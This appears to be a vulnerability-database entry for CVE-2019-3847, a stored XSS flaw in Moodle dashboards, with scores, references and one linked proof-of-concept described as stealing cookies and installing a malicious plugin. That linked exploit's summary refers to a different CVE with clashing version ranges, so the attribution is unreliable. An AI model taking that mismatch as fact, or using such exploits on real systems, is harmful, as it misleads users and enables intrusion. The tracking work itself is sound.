CVE-2019-3847

MEDIUM

moodle < 3.1.17 and 3.6.0-3.6.3 - Stored Cross-Site Scripting in Dashboard JavaScript

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2019-3847. PoCs published by danielthatcher.

AI-analyzed exploit summary This repository contains a proof-of-concept exploit for CVE-2018-16854, a CSRF vulnerability in Moodle's login form. The exploit leverages JavaScript injection to steal session cookies and install a malicious plugin, leading to remote code execution.

Description

A vulnerability was found in moodle before versions 3.6.3, 3.5.5, 3.4.8 and 3.1.17. Users with the "login as other users" capability (such as administrators/managers) can access other users' Dashboards, but the JavaScript those other users may have added to their Dashboard was not being escaped when being viewed by the user logging in on their behalf.

Exploits (1)

nomisec WORKING POC 7 stars

by danielthatcher · poc

https://github.com/danielthatcher/moodle-login-csrf

View Code ZIP pw:eip

This repository contains a proof-of-concept exploit for CVE-2018-16854, a CSRF vulnerability in Moodle's login form. The exploit leverages JavaScript injection to steal session cookies and install a malicious plugin, leading to remote code execution.

Classification

Working Poc 95%

Attack Type

Auth Bypass, Xss, Rce

Complexity

Moderate

Reliability

Reliable

Target: Moodle versions before 3.6, 3.5.3, 3.4.6, 3.3.9, and 3.1.15

No auth needed

Prerequisites: Victim must visit a malicious page with the exploit JavaScript · Attacker must have a server to host the malicious plugin and receive stolen cookies

MITRE ATT&CK

T1189 - Drive-by Compromise T1059 - Command and Scripting Interpreter T1078 - Valid Accounts

devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (3)

Core 3

Core References

Broken Link, Third Party Advisory, VDB Entry vdb-entry

http://www.securityfocus.com/bid/107489

Issue Tracking, Patch, Third Party Advisory

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3847

Patch, Vendor Advisory

https://moodle.org/mod/forum/discuss.php?d=384010#p1547742

Scores

CVSS v3 4.8

EPSS 0.0087

EPSS Percentile 75.7%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Details

CWE

CWE-79

Status published

Products (2)

moodle/moodle < 3.1.17

moodle/moodle 3.6.0 - 3.6.3Packagist

Published Mar 27, 2019

Tracked Since Feb 18, 2026